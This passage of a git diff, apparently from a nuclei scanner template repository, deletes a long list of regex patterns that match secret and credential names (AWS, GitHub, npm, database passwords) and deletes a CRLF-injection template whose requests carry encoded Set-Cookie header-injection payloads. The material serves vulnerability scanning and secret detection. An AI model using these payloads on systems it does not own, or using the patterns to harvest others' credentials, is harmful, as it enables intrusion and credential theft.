- - "sandbox[_-]?access[_-]?token(=| =|:| :)"
- - "salesforce[_-]?bulk[_-]?test[_-]?security[_-]?token(=| =|:| :)"
- - "salesforce[_-]?bulk[_-]?test[_-]?password(=| =|:| :)"
- - "sacloud[_-]?api(=| =|:| :)"
- - "sacloud[_-]?access[_-]?token[_-]?secret(=| =|:| :)"
- - "sacloud[_-]?access[_-]?token(=| =|:| :)"
- - "s3[_-]?user[_-]?secret(=| =|:| :)"
- - "s3[_-]?secret[_-]?key(=| =|:| :)"
- - "s3[_-]?secret[_-]?assets(=| =|:| :)"
- - "s3[_-]?secret[_-]?app[_-]?logs(=| =|:| :)"
- - "s3[_-]?key[_-]?assets(=| =|:| :)"
- - "s3[_-]?key[_-]?app[_-]?logs(=| =|:| :)"
- - "s3[_-]?key(=| =|:| :)"
- - "s3[_-]?external[_-]?3[_-]?amazonaws[_-]?com(=| =|:| :)"
- - "s3[_-]?bucket[_-]?name[_-]?assets(=| =|:| :)"
- - "s3[_-]?bucket[_-]?name[_-]?app[_-]?logs(=| =|:| :)"
- - "s3[_-]?access[_-]?key[_-]?id(=| =|:| :)"
- - "s3[_-]?access[_-]?key(=| =|:| :)"
- - "rubygems[_-]?auth[_-]?token(=| =|:| :)"
- - "rtd[_-]?store[_-]?pass(=| =|:| :)"
- - "rtd[_-]?key[_-]?pass(=| =|:| :)"
- - "route53[_-]?access[_-]?key[_-]?id(=| =|:| :)"
- - "ropsten[_-]?private[_-]?key(=| =|:| :)"
- - "rinkeby[_-]?private[_-]?key(=| =|:| :)"
- - "rest[_-]?api[_-]?key(=| =|:| :)"
- - "repotoken(=| =|:| :)"
- - "reporting[_-]?webdav[_-]?url(=| =|:| :)"
- - "reporting[_-]?webdav[_-]?pwd(=| =|:| :)"
- - "release[_-]?token(=| =|:| :)"
- - "release[_-]?gh[_-]?token(=| =|:| :)"
- - "registry[_-]?secure(=| =|:| :)"
- - "registry[_-]?pass(=| =|:| :)"
- - "refresh[_-]?token(=| =|:| :)"
- - "rediscloud[_-]?url(=| =|:| :)"
- - "redis[_-]?stunnel[_-]?urls(=| =|:| :)"
- - "randrmusicapiaccesstoken(=| =|:| :)"
- - "rabbitmq[_-]?password(=| =|:| :)"
- - "quip[_-]?token(=| =|:| :)"
- - "qiita[_-]?token(=| =|:| :)"
- - "pypi[_-]?passowrd(=| =|:| :)"
- - "pushover[_-]?token(=| =|:| :)"
- - "publish[_-]?secret(=| =|:| :)"
- - "publish[_-]?key(=| =|:| :)"
- - "publish[_-]?access(=| =|:| :)"
- - "project[_-]?config(=| =|:| :)"
- - "prod[_-]?secret[_-]?key(=| =|:| :)"
- - "prod[_-]?password(=| =|:| :)"
- - "prod[_-]?access[_-]?key[_-]?id(=| =|:| :)"
- - "private[_-]?signing[_-]?password(=| =|:| :)"
- - "pring[_-]?mail[_-]?username(=| =|:| :)"
- - "preferred[_-]?username(=| =|:| :)"
- - "prebuild[_-]?auth(=| =|:| :)"
- - "postgresql[_-]?pass(=| =|:| :)"
- - "postgresql[_-]?db(=| =|:| :)"
- - "postgres[_-]?env[_-]?postgres[_-]?password(=| =|:| :)"
- - "postgres[_-]?env[_-]?postgres[_-]?db(=| =|:| :)"
- - "plugin[_-]?password(=| =|:| :)"
- - "plotly[_-]?apikey(=| =|:| :)"
- - "places[_-]?apikey(=| =|:| :)"
- - "places[_-]?api[_-]?key(=| =|:| :)"
- - "pg[_-]?host(=| =|:| :)"
- - "pg[_-]?database(=| =|:| :)"
- - "personal[_-]?secret(=| =|:| :)"
- - "personal[_-]?key(=| =|:| :)"
- - "percy[_-]?token(=| =|:| :)"
- - "percy[_-]?project(=| =|:| :)"
- - "paypal[_-]?client[_-]?secret(=| =|:| :)"
- - "passwordtravis(=| =|:| :)"
- - "parse[_-]?js[_-]?key(=| =|:| :)"
- - "pagerduty[_-]?apikey(=| =|:| :)"
- - "packagecloud[_-]?token(=| =|:| :)"
- - "ossrh[_-]?username(=| =|:| :)"
- - "ossrh[_-]?secret(=| =|:| :)"
- - "ossrh[_-]?password(=| =|:| :)"
- - "ossrh[_-]?pass(=| =|:| :)"
- - "ossrh[_-]?jira[_-]?password(=| =|:| :)"
- - "os[_-]?password(=| =|:| :)"
- - "os[_-]?auth[_-]?url(=| =|:| :)"
- - "org[_-]?project[_-]?gradle[_-]?sonatype[_-]?nexus[_-]?password(=| =|:| :)"
- - "org[_-]?gradle[_-]?project[_-]?sonatype[_-]?nexus[_-]?password(=| =|:| :)"
- - "openwhisk[_-]?key(=| =|:| :)"
- - "open[_-]?whisk[_-]?key(=| =|:| :)"
- - "onesignal[_-]?user[_-]?auth[_-]?key(=| =|:| :)"
- - "onesignal[_-]?api[_-]?key(=| =|:| :)"
- - "omise[_-]?skey(=| =|:| :)"
- - "omise[_-]?pubkey(=| =|:| :)"
- - "omise[_-]?pkey(=| =|:| :)"
- - "omise[_-]?key(=| =|:| :)"
- - "okta[_-]?oauth2[_-]?clientsecret(=| =|:| :)"
- - "okta[_-]?oauth2[_-]?client[_-]?secret(=| =|:| :)"
- - "okta[_-]?client[_-]?token(=| =|:| :)"
- - "ofta[_-]?secret(=| =|:| :)"
- - "ofta[_-]?region(=| =|:| :)"
- - "ofta[_-]?key(=| =|:| :)"
- - "octest[_-]?password(=| =|:| :)"
- - "octest[_-]?app[_-]?username(=| =|:| :)"
- - "octest[_-]?app[_-]?password(=| =|:| :)"
- - "oc[_-]?pass(=| =|:| :)"
- - "object[_-]?store[_-]?creds(=| =|:| :)"
- - "object[_-]?store[_-]?bucket(=| =|:| :)"
- - "object[_-]?storage[_-]?region[_-]?name(=| =|:| :)"
- - "object[_-]?storage[_-]?password(=| =|:| :)"
- - "oauth[_-]?token(=| =|:| :)"
- - "numbers[_-]?service[_-]?pass(=| =|:| :)"
- - "nuget[_-]?key(=| =|:| :)"
- - "nuget[_-]?apikey(=| =|:| :)"
- - "nuget[_-]?api[_-]?key(=| =|:| :)"
- - "npm[_-]?token(=| =|:| :)"
- - "npm[_-]?secret[_-]?key(=| =|:| :)"
- - "npm[_-]?password(=| =|:| :)"
- - "npm[_-]?email(=| =|:| :)"
- - "npm[_-]?auth[_-]?token(=| =|:| :)"
- - "npm[_-]?api[_-]?token(=| =|:| :)"
- - "npm[_-]?api[_-]?key(=| =|:| :)"
- - "now[_-]?token(=| =|:| :)"
- - "non[_-]?token(=| =|:| :)"
- - "node[_-]?pre[_-]?gyp[_-]?secretaccesskey(=| =|:| :)"
- - "node[_-]?pre[_-]?gyp[_-]?github[_-]?token(=| =|:| :)"
- - "node[_-]?pre[_-]?gyp[_-]?accesskeyid(=| =|:| :)"
- - "node[_-]?env(=| =|:| :)"
- - "ngrok[_-]?token(=| =|:| :)"
- - "ngrok[_-]?auth[_-]?token(=| =|:| :)"
- - "nexuspassword(=| =|:| :)"
- - "nexus[_-]?password(=| =|:| :)"
- - "new[_-]?relic[_-]?beta[_-]?token(=| =|:| :)"
- - "netlify[_-]?api[_-]?key(=| =|:| :)"
- - "nativeevents(=| =|:| :)"
- - "mysqlsecret(=| =|:| :)"
- - "mysqlmasteruser(=| =|:| :)"
- - "mysql[_-]?username(=| =|:| :)"
- - "mysql[_-]?user(=| =|:| :)"
- - "mysql[_-]?root[_-]?password(=| =|:| :)"
- - "mysql[_-]?password(=| =|:| :)"
- - "mysql[_-]?hostname(=| =|:| :)"
- - "mysql[_-]?database(=| =|:| :)"
- - "my[_-]?secret[_-]?env(=| =|:| :)"
- - "multi[_-]?workspace[_-]?sid(=| =|:| :)"
- - "multi[_-]?workflow[_-]?sid(=| =|:| :)"
- - "multi[_-]?disconnect[_-]?sid(=| =|:| :)"
- - "multi[_-]?connect[_-]?sid(=| =|:| :)"
- - "multi[_-]?bob[_-]?sid(=| =|:| :)"
- - "minio[_-]?secret[_-]?key(=| =|:| :)"
- - "minio[_-]?access[_-]?key(=| =|:| :)"
- - "mile[_-]?zero[_-]?key(=| =|:| :)"
- - "mh[_-]?password(=| =|:| :)"
- - "mh[_-]?apikey(=| =|:| :)"
- - "mg[_-]?public[_-]?api[_-]?key(=| =|:| :)"
- - "mg[_-]?api[_-]?key(=| =|:| :)"
- - "mapboxaccesstoken(=| =|:| :)"
- - "mapbox[_-]?aws[_-]?secret[_-]?access[_-]?key(=| =|:| :)"
- - "mapbox[_-]?aws[_-]?access[_-]?key[_-]?id(=| =|:| :)"
- - "mapbox[_-]?api[_-]?token(=| =|:| :)"
- - "mapbox[_-]?access[_-]?token(=| =|:| :)"
- - "manifest[_-]?app[_-]?url(=| =|:| :)"
- - "manifest[_-]?app[_-]?token(=| =|:| :)"
- - "mandrill[_-]?api[_-]?key(=| =|:| :)"
- - "managementapiaccesstoken(=| =|:| :)"
- - "management[_-]?token(=| =|:| :)"
- - "manage[_-]?secret(=| =|:| :)"
- - "manage[_-]?key(=| =|:| :)"
- - "mailgun[_-]?secret[_-]?api[_-]?key(=| =|:| :)"
- - "mailgun[_-]?pub[_-]?key(=| =|:| :)"
- - "mailgun[_-]?pub[_-]?apikey(=| =|:| :)"
- - "mailgun[_-]?priv[_-]?key(=| =|:| :)"
- - "mailgun[_-]?password(=| =|:| :)"
- - "mailgun[_-]?apikey(=| =|:| :)"
- - "mailgun[_-]?api[_-]?key(=| =|:| :)"
- - "mailer[_-]?password(=| =|:| :)"
- - "mailchimp[_-]?key(=| =|:| :)"
- - "mailchimp[_-]?api[_-]?key(=| =|:| :)"
- - "mail[_-]?password(=| =|:| :)"
- - "magento[_-]?password(=| =|:| :)"
- - "magento[_-]?auth[_-]?username (=| =|:| :)"
- - "magento[_-]?auth[_-]?password(=| =|:| :)"
- - "lottie[_-]?upload[_-]?cert[_-]?key[_-]?store[_-]?password(=| =|:| :)"
- - "lottie[_-]?upload[_-]?cert[_-]?key[_-]?password(=| =|:| :)"
- - "lottie[_-]?s3[_-]?secret[_-]?key(=| =|:| :)"
- - "lottie[_-]?happo[_-]?secret[_-]?key(=| =|:| :)"
- - "lottie[_-]?happo[_-]?api[_-]?key(=| =|:| :)"
- - "looker[_-]?test[_-]?runner[_-]?client[_-]?secret(=| =|:| :)"
- - "ll[_-]?shared[_-]?key(=| =|:| :)"
- - "ll[_-]?publish[_-]?url(=| =|:| :)"
- - "linux[_-]?signing[_-]?key(=| =|:| :)"
- - "linkedin[_-]?client[_-]?secretor lottie[_-]?s3[_-]?api[_-]?key(=| =|:| :)"
- - "lighthouse[_-]?api[_-]?key(=| =|:| :)"
- - "lektor[_-]?deploy[_-]?username(=| =|:| :)"
- - "lektor[_-]?deploy[_-]?password(=| =|:| :)"
- - "leanplum[_-]?key(=| =|:| :)"
- - "kxoltsn3vogdop92m(=| =|:| :)"
- - "kubeconfig(=| =|:| :)"
- - "kubecfg[_-]?s3[_-]?path(=| =|:| :)"
- - "kovan[_-]?private[_-]?key(=| =|:| :)"
- - "keystore[_-]?pass(=| =|:| :)"
- - "kafka[_-]?rest[_-]?url(=| =|:| :)"
- - "kafka[_-]?instance[_-]?name(=| =|:| :)"
- - "kafka[_-]?admin[_-]?url(=| =|:| :)"
- - "jwt[_-]?secret(=| =|:| :)"
- - "jdbc:mysql(=| =|:| :)"
- - "jdbc[_-]?host(=| =|:| :)"
- - "jdbc[_-]?databaseurl(=| =|:| :)"
- - "itest[_-]?gh[_-]?token(=| =|:| :)"
- - "ios[_-]?docs[_-]?deploy[_-]?token(=| =|:| :)"
- - "internal[_-]?secrets(=| =|:| :)"
- - "integration[_-]?test[_-]?appid(=| =|:| :)"
- - "integration[_-]?test[_-]?api[_-]?key(=| =|:| :)"
- - "index[_-]?name(=| =|:| :)"
- - "ij[_-]?repo[_-]?username(=| =|:| :)"
- - "ij[_-]?repo[_-]?password(=| =|:| :)"
- - "hub[_-]?dxia2[_-]?password(=| =|:| :)"
- - "homebrew[_-]?github[_-]?api[_-]?token(=| =|:| :)"
- - "hockeyapp[_-]?token(=| =|:| :)"
- - "heroku[_-]?token(=| =|:| :)"
- - "heroku[_-]?email(=| =|:| :)"
- - "heroku[_-]?api[_-]?key(=| =|:| :)"
- - "hb[_-]?codesign[_-]?key[_-]?pass(=| =|:| :)"
- - "hb[_-]?codesign[_-]?gpg[_-]?pass(=| =|:| :)"
- - "hab[_-]?key(=| =|:| :)"
- - "hab[_-]?auth[_-]?token(=| =|:| :)"
- - "grgit[_-]?user(=| =|:| :)"
- - "gren[_-]?github[_-]?token(=| =|:| :)"
- - "gradle[_-]?signing[_-]?password(=| =|:| :)"
- - "gradle[_-]?signing[_-]?key[_-]?id(=| =|:| :)"
- - "gradle[_-]?publish[_-]?secret(=| =|:| :)"
- - "gradle[_-]?publish[_-]?key(=| =|:| :)"
- - "gpg[_-]?secret[_-]?keys(=| =|:| :)"
- - "gpg[_-]?private[_-]?key(=| =|:| :)"
- - "gpg[_-]?passphrase(=| =|:| :)"
- - "gpg[_-]?ownertrust(=| =|:| :)"
- - "gpg[_-]?keyname(=| =|:| :)"
- - "gpg[_-]?key[_-]?name(=| =|:| :)"
- - "google[_-]?private[_-]?key(=| =|:| :)"
- - "google[_-]?maps[_-]?api[_-]?key(=| =|:| :)"
- - "google[_-]?client[_-]?secret(=| =|:| :)"
- - "google[_-]?client[_-]?id(=| =|:| :)"
- - "google[_-]?client[_-]?email(=| =|:| :)"
- - "google[_-]?account[_-]?type(=| =|:| :)"
- - "gogs[_-]?password(=| =|:| :)"
- - "gitlab[_-]?user[_-]?email(=| =|:| :)"
- - "github[_-]?tokens(=| =|:| :)"
- - "github[_-]?token(=| =|:| :)"
- - "github[_-]?repo(=| =|:| :)"
- - "github[_-]?release[_-]?token(=| =|:| :)"
- - "github[_-]?pwd(=| =|:| :)"
- - "github[_-]?password(=| =|:| :)"
- - "github[_-]?oauth[_-]?token(=| =|:| :)"
- - "github[_-]?oauth(=| =|:| :)"
- - "github[_-]?key(=| =|:| :)"
- - "github[_-]?hunter[_-]?username(=| =|:| :)"
- - "github[_-]?hunter[_-]?token(=| =|:| :)"
- - "github[_-]?deployment[_-]?token(=| =|:| :)"
- - "github[_-]?deploy[_-]?hb[_-]?doc[_-]?pass(=| =|:| :)"
- - "github[_-]?client[_-]?secret(=| =|:| :)"
- - "github[_-]?auth[_-]?token(=| =|:| :)"
- - "github[_-]?auth(=| =|:| :)"
- - "github[_-]?api[_-]?token(=| =|:| :)"
- - "github[_-]?api[_-]?key(=| =|:| :)"
- - "github[_-]?access[_-]?token(=| =|:| :)"
- - "git[_-]?token(=| =|:| :)"
- - "git[_-]?name(=| =|:| :)"
- - "git[_-]?email(=| =|:| :)"
- - "git[_-]?committer[_-]?name(=| =|:| :)"
- - "git[_-]?committer[_-]?email(=| =|:| :)"
- - "git[_-]?author[_-]?name(=| =|:| :)"
- - "git[_-]?author[_-]?email(=| =|:| :)"
- - "ghost[_-]?api[_-]?key(=| =|:| :)"
- - "ghb[_-]?token(=| =|:| :)"
- - "gh[_-]?unstable[_-]?oauth[_-]?client[_-]?secret(=| =|:| :)"
- - "gh[_-]?token(=| =|:| :)"
- - "gh[_-]?repo[_-]?token(=| =|:| :)"
- - "gh[_-]?oauth[_-]?token(=| =|:| :)"
- - "gh[_-]?oauth[_-]?client[_-]?secret(=| =|:| :)"
- - "gh[_-]?next[_-]?unstable[_-]?oauth[_-]?client[_-]?secret(=| =|:| :)"
- - "gh[_-]?next[_-]?unstable[_-]?oauth[_-]?client[_-]?id(=| =|:| :)"
- - "gh[_-]?next[_-]?oauth[_-]?client[_-]?secret(=| =|:| :)"
- - "gh[_-]?email(=| =|:| :)"
- - "gh[_-]?api[_-]?key(=| =|:| :)"
- - "gcs[_-]?bucket(=| =|:| :)"
- - "gcr[_-]?password(=| =|:| :)"
- - "gcloud[_-]?service[_-]?key(=| =|:| :)"
- - "gcloud[_-]?project(=| =|:| :)"
- - "gcloud[_-]?bucket(=| =|:| :)"
- - "ftp[_-]?username(=| =|:| :)"
- - "ftp[_-]?user(=| =|:| :)"
- - "ftp[_-]?pw(=| =|:| :)"
- - "ftp[_-]?password(=| =|:| :)"
- - "ftp[_-]?login(=| =|:| :)"
- - "ftp[_-]?host(=| =|:| :)"
- - "fossa[_-]?api[_-]?key(=| =|:| :)"
- - "flickr[_-]?api[_-]?secret(=| =|:| :)"
- - "flickr[_-]?api[_-]?key(=| =|:| :)"
- - "flask[_-]?secret[_-]?key(=| =|:| :)"
- - "firefox[_-]?secret(=| =|:| :)"
- - "firebase[_-]?token(=| =|:| :)"
- - "firebase[_-]?project[_-]?develop(=| =|:| :)"
- - "firebase[_-]?key(=| =|:| :)"
- - "firebase[_-]?api[_-]?token(=| =|:| :)"
- - "firebase[_-]?api[_-]?json(=| =|:| :)"
- - "file[_-]?password(=| =|:| :)"
- - "exp[_-]?password(=| =|:| :)"
- - "eureka[_-]?awssecretkey(=| =|:| :)"
- - "env[_-]?sonatype[_-]?password(=| =|:| :)"
- - "env[_-]?secret[_-]?access[_-]?key(=| =|:| :)"
- - "env[_-]?secret(=| =|:| :)"
- - "env[_-]?key(=| =|:| :)"
- - "env[_-]?heroku[_-]?api[_-]?key(=| =|:| :)"
- - "env[_-]?github[_-]?oauth[_-]?token(=| =|:| :)"
- - "end[_-]?user[_-]?password(=| =|:| :)"
- - "encryption[_-]?password(=| =|:| :)"
- - "elasticsearch[_-]?password(=| =|:| :)"
- - "elastic[_-]?cloud[_-]?auth(=| =|:| :)"
- - "dsonar[_-]?projectkey(=| =|:| :)"
- - "dsonar[_-]?login(=| =|:| :)"
- - "droplet[_-]?travis[_-]?password(=| =|:| :)"
- - "dropbox[_-]?oauth[_-]?bearer(=| =|:| :)"
- - "doordash[_-]?auth[_-]?token(=| =|:| :)"
- - "dockerhubpassword(=| =|:| :)"
- - "dockerhub[_-]?password(=| =|:| :)"
- - "docker[_-]?token(=| =|:| :)"
- - "docker[_-]?postgres[_-]?url(=| =|:| :)"
- - "docker[_-]?password(=| =|:| :)"
- - "docker[_-]?passwd(=| =|:| :)"
- - "docker[_-]?pass(=| =|:| :)"
- - "docker[_-]?key(=| =|:| :)"
- - "docker[_-]?hub[_-]?password(=| =|:| :)"
- - "digitalocean[_-]?ssh[_-]?key[_-]?ids(=| =|:| :)"
- - "digitalocean[_-]?ssh[_-]?key[_-]?body(=| =|:| :)"
- - "digitalocean[_-]?access[_-]?token(=| =|:| :)"
- - "dgpg[_-]?passphrase(=| =|:| :)"
- - "deploy[_-]?user(=| =|:| :)"
- - "deploy[_-]?token(=| =|:| :)"
- - "deploy[_-]?secure(=| =|:| :)"
- - "deploy[_-]?password(=| =|:| :)"
- - "ddgc[_-]?github[_-]?token(=| =|:| :)"
- - "ddg[_-]?test[_-]?email[_-]?pw(=| =|:| :)"
- - "ddg[_-]?test[_-]?email(=| =|:| :)"
- - "db[_-]?username(=| =|:| :)"
- - "db[_-]?user(=| =|:| :)"
- - "db[_-]?pw(=| =|:| :)"
- - "db[_-]?password(=| =|:| :)"
- - "db[_-]?host(=| =|:| :)"
- - "db[_-]?database(=| =|:| :)"
- - "db[_-]?connection(=| =|:| :)"
- - "datadog[_-]?app[_-]?key(=| =|:| :)"
- - "datadog[_-]?api[_-]?key(=| =|:| :)"
- - "database[_-]?username(=| =|:| :)"
- - "database[_-]?user(=| =|:| :)"
- - "database[_-]?port(=| =|:| :)"
- - "database[_-]?password(=| =|:| :)"
- - "database[_-]?name(=| =|:| :)"
- - "database[_-]?host(=| =|:| :)"
- - "danger[_-]?github[_-]?api[_-]?token(=| =|:| :)"
- - "cypress[_-]?record[_-]?key(=| =|:| :)"
- - "coverity[_-]?scan[_-]?token(=| =|:| :)"
- - "coveralls[_-]?token(=| =|:| :)"
- - "coveralls[_-]?repo[_-]?token(=| =|:| :)"
- - "coveralls[_-]?api[_-]?token(=| =|:| :)"
- - "cos[_-]?secrets(=| =|:| :)"
- - "conversation[_-]?username(=| =|:| :)"
- - "conversation[_-]?password(=| =|:| :)"
- - "contentful[_-]?v2[_-]?access[_-]?token(=| =|:| :)"
- - "contentful[_-]?test[_-]?org[_-]?cma[_-]?token(=| =|:| :)"
- - "contentful[_-]?php[_-]?management[_-]?test[_-]?token(=| =|:| :)"
- - "contentful[_-]?management[_-]?api[_-]?access[_-]?token[_-]?new(=| =|:| :)"
- - "contentful[_-]?management[_-]?api[_-]?access[_-]?token(=| =|:| :)"
- - "contentful[_-]?integration[_-]?management[_-]?token(=| =|:| :)"
- - "contentful[_-]?cma[_-]?test[_-]?token(=| =|:| :)"
- - "contentful[_-]?access[_-]?token(=| =|:| :)"
- - "consumerkey(=| =|:| :)"
- - "consumer[_-]?key(=| =|:| :)"
- - "conekta[_-]?apikey(=| =|:| :)"
- - "coding[_-]?token(=| =|:| :)"
- - "codecov[_-]?token(=| =|:| :)"
- - "codeclimate[_-]?repo[_-]?token(=| =|:| :)"
- - "codacy[_-]?project[_-]?token(=| =|:| :)"
- - "cocoapods[_-]?trunk[_-]?token(=| =|:| :)"
- - "cocoapods[_-]?trunk[_-]?email(=| =|:| :)"
- - "cn[_-]?secret[_-]?access[_-]?key(=| =|:| :)"
- - "cn[_-]?access[_-]?key[_-]?id(=| =|:| :)"
- - "clu[_-]?ssh[_-]?private[_-]?key[_-]?base64(=| =|:| :)"
- - "clu[_-]?repo[_-]?url(=| =|:| :)"
- - "cloudinary[_-]?url[_-]?staging(=| =|:| :)"
- - "cloudinary[_-]?url(=| =|:| :)"
- - "cloudflare[_-]?email(=| =|:| :)"
- - "cloudflare[_-]?auth[_-]?key(=| =|:| :)"
- - "cloudflare[_-]?auth[_-]?email(=| =|:| :)"
- - "cloudflare[_-]?api[_-]?key(=| =|:| :)"
- - "cloudant[_-]?service[_-]?database(=| =|:| :)"
- - "cloudant[_-]?processed[_-]?database(=| =|:| :)"
- - "cloudant[_-]?password(=| =|:| :)"
- - "cloudant[_-]?parsed[_-]?database(=| =|:| :)"
- - "cloudant[_-]?order[_-]?database(=| =|:| :)"
- - "cloudant[_-]?instance(=| =|:| :)"
- - "cloudant[_-]?database(=| =|:| :)"
- - "cloudant[_-]?audited[_-]?database(=| =|:| :)"
- - "cloudant[_-]?archived[_-]?database(=| =|:| :)"
- - "cloud[_-]?api[_-]?key(=| =|:| :)"
- - "clojars[_-]?password(=| =|:| :)"
- - "client[_-]?secret(=| =|:| :)"
- - "cli[_-]?e2e[_-]?cma[_-]?token(=| =|:| :)"
- - "claimr[_-]?token(=| =|:| :)"
- - "claimr[_-]?superuser(=| =|:| :)"
- - "claimr[_-]?db(=| =|:| :)"
- - "claimr[_-]?database(=| =|:| :)"
- - "ci[_-]?user[_-]?token(=| =|:| :)"
- - "ci[_-]?server[_-]?name(=| =|:| :)"
- - "ci[_-]?registry[_-]?user(=| =|:| :)"
- - "ci[_-]?project[_-]?url(=| =|:| :)"
- - "ci[_-]?deploy[_-]?password(=| =|:| :)"
- - "chrome[_-]?refresh[_-]?token(=| =|:| :)"
- - "chrome[_-]?client[_-]?secret(=| =|:| :)"
- - "cheverny[_-]?token(=| =|:| :)"
- - "cf[_-]?password(=| =|:| :)"
- - "certificate[_-]?password(=| =|:| :)"
- - "censys[_-]?secret(=| =|:| :)"
- - "cattle[_-]?secret[_-]?key(=| =|:| :)"
- - "cattle[_-]?agent[_-]?instance[_-]?auth(=| =|:| :)"
- - "cattle[_-]?access[_-]?key(=| =|:| :)"
- - "cargo[_-]?token(=| =|:| :)"
- - "cache[_-]?s3[_-]?secret[_-]?key(=| =|:| :)"
- - "bx[_-]?username(=| =|:| :)"
- - "bx[_-]?password(=| =|:| :)"
- - "bundlesize[_-]?github[_-]?token(=| =|:| :)"
- - "built[_-]?branch[_-]?deploy[_-]?key(=| =|:| :)"
- - "bucketeer[_-]?aws[_-]?secret[_-]?access[_-]?key(=| =|:| :)"
- - "bucketeer[_-]?aws[_-]?access[_-]?key[_-]?id(=| =|:| :)"
- - "browserstack[_-]?access[_-]?key(=| =|:| :)"
- - "browser[_-]?stack[_-]?access[_-]?key(=| =|:| :)"
- - "brackets[_-]?repo[_-]?oauth[_-]?token(=| =|:| :)"
- - "bluemix[_-]?username(=| =|:| :)"
- - "bluemix[_-]?pwd(=| =|:| :)"
- - "bluemix[_-]?password(=| =|:| :)"
- - "bluemix[_-]?pass[_-]?prod(=| =|:| :)"
- - "bluemix[_-]?pass(=| =|:| :)"
- - "bluemix[_-]?auth(=| =|:| :)"
- - "bluemix[_-]?api[_-]?key(=| =|:| :)"
- - "bintraykey(=| =|:| :)"
- - "bintray[_-]?token(=| =|:| :)"
- - "bintray[_-]?key(=| =|:| :)"
- - "bintray[_-]?gpg[_-]?password(=| =|:| :)"
- - "bintray[_-]?apikey(=| =|:| :)"
- - "bintray[_-]?api[_-]?key(=| =|:| :)"
- - "b2[_-]?bucket(=| =|:| :)"
- - "b2[_-]?app[_-]?key(=| =|:| :)"
- - "awssecretkey(=| =|:| :)"
- - "awscn[_-]?secret[_-]?access[_-]?key(=| =|:| :)"
- - "awscn[_-]?access[_-]?key[_-]?id(=| =|:| :)"
- - "awsaccesskeyid(=| =|:| :)"
- - "aws[_-]?ses[_-]?secret[_-]?access[_-]?key(=| =|:| :)"
- - "aws[_-]?ses[_-]?access[_-]?key[_-]?id(=| =|:| :)"
- - "aws[_-]?secrets(=| =|:| :)"
- - "aws[_-]?secret[_-]?key(=| =|:| :)"
- - "aws[_-]?secret[_-]?access[_-]?key(=| =|:| :)"
- - "aws[_-]?secret(=| =|:| :)"
- - "aws[_-]?key(=| =|:| :)"
- - "aws[_-]?config[_-]?secretaccesskey(=| =|:| :)"
- - "aws[_-]?config[_-]?accesskeyid(=| =|:| :)"
- - "aws[_-]?access[_-]?key[_-]?id(=| =|:| :)"
- - "aws[_-]?access[_-]?key(=| =|:| :)"
- - "aws[_-]?access(=| =|:| :)"
- - "author[_-]?npm[_-]?api[_-]?key(=| =|:| :)"
- - "author[_-]?email[_-]?addr(=| =|:| :)"
- - "auth0[_-]?client[_-]?secret(=| =|:| :)"
- - "auth0[_-]?api[_-]?clientsecret(=| =|:| :)"
- - "auth[_-]?token(=| =|:| :)"
- - "assistant[_-]?iam[_-]?apikey(=| =|:| :)"
- - "artifacts[_-]?secret(=| =|:| :)"
- - "artifacts[_-]?key(=| =|:| :)"
- - "artifacts[_-]?bucket(=| =|:| :)"
- - "artifacts[_-]?aws[_-]?secret[_-]?access[_-]?key(=| =|:| :)"
- - "artifacts[_-]?aws[_-]?access[_-]?key[_-]?id(=| =|:| :)"
- - "artifactory[_-]?key(=| =|:| :)"
- - "argos[_-]?token(=| =|:| :)"
- - "apple[_-]?id[_-]?password(=| =|:| :)"
- - "appclientsecret(=| =|:| :)"
- - "app[_-]?token(=| =|:| :)"
- - "app[_-]?secrete(=| =|:| :)"
- - "app[_-]?report[_-]?token[_-]?key(=| =|:| :)"
- - "app[_-]?bucket[_-]?perm(=| =|:| :)"
- - "apigw[_-]?access[_-]?token(=| =|:| :)"
- - "apiary[_-]?api[_-]?key(=| =|:| :)"
- - "api[_-]?secret(=| =|:| :)"
- - "api[_-]?key[_-]?sid(=| =|:| :)"
- - "api[_-]?key[_-]?secret(=| =|:| :)"
- - "api[_-]?key(=| =|:| :)"
- - "aos[_-]?sec(=| =|:| :)"
- - "aos[_-]?key(=| =|:| :)"
- - "ansible[_-]?vault[_-]?password(=| =|:| :)"
- - "android[_-]?docs[_-]?deploy[_-]?token(=| =|:| :)"
- - "anaconda[_-]?token(=| =|:| :)"
- - "amazon[_-]?secret[_-]?access[_-]?key(=| =|:| :)"
- - "amazon[_-]?bucket[_-]?name(=| =|:| :)"
- - "alicloud[_-]?secret[_-]?key(=| =|:| :)"
- - "alicloud[_-]?access[_-]?key(=| =|:| :)"
- - "alias[_-]?pass(=| =|:| :)"
- - "algolia[_-]?search[_-]?key[_-]?1(=| =|:| :)"
- - "algolia[_-]?search[_-]?key(=| =|:| :)"
- - "algolia[_-]?search[_-]?api[_-]?key(=| =|:| :)"
- - "algolia[_-]?api[_-]?key[_-]?search(=| =|:| :)"
- - "algolia[_-]?api[_-]?key[_-]?mcm(=| =|:| :)"
- - "algolia[_-]?api[_-]?key(=| =|:| :)"
- - "algolia[_-]?admin[_-]?key[_-]?mcm(=| =|:| :)"
- - "algolia[_-]?admin[_-]?key[_-]?2(=| =|:| :)"
- - "algolia[_-]?admin[_-]?key[_-]?1(=| =|:| :)"
- - "adzerk[_-]?api[_-]?key(=| =|:| :)"
- - "admin[_-]?email(=| =|:| :)"
- - "account[_-]?sid(=| =|:| :)"
- - "access[_-]?token(=| =|:| :)"
- - "access[_-]?secret(=| =|:| :)"
- - "access[_-]?key[_-]?secret(=| =|:| :)"
\ No newline at end of file
diff --git a/nuclei-templates/Other/crlf-injection-1265.yaml b/nuclei-templates/Other/crlf-injection-1265.yaml
deleted file mode 100644
index 4876a8a42c..0000000000
--- a/nuclei-templates/Other/crlf-injection-1265.yaml
+++ /dev/null
@@ -1,27 +0,0 @@
-id: crlf-injection
-
-info:
- name: CRLF injection
- author: melbadry9 & nadino & xElkomy
- severity: low
- description: Improper sanitization of CRLF sequences.
- tags: crlf
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/%0D%0ASet-Cookie:crlfinjection=crlfinjection"
- - "{{BaseURL}}/%E5%98%8D%E5%98%8ASet-Cookie:crlfinjection=crlfinjection" # unicode bypass
- - "{{BaseURL}}/%0DSet-Cookie:crlfinjection=crlfinjection"
- - "{{BaseURL}}/%0ASet-Cookie:crlfinjection=crlfinjection"
- - "{{BaseURL}}/%3F%0DSet-Cookie%3Acrlfinjection=crlfinjection"
- - "{{BaseURL}}/%0ASet-Cookie%3Acrlfinjection/.." # Apache
- - "{{BaseURL}}/~user/%0D%0ASet-Cookie:crlfinjection" # CVE-2016-4975
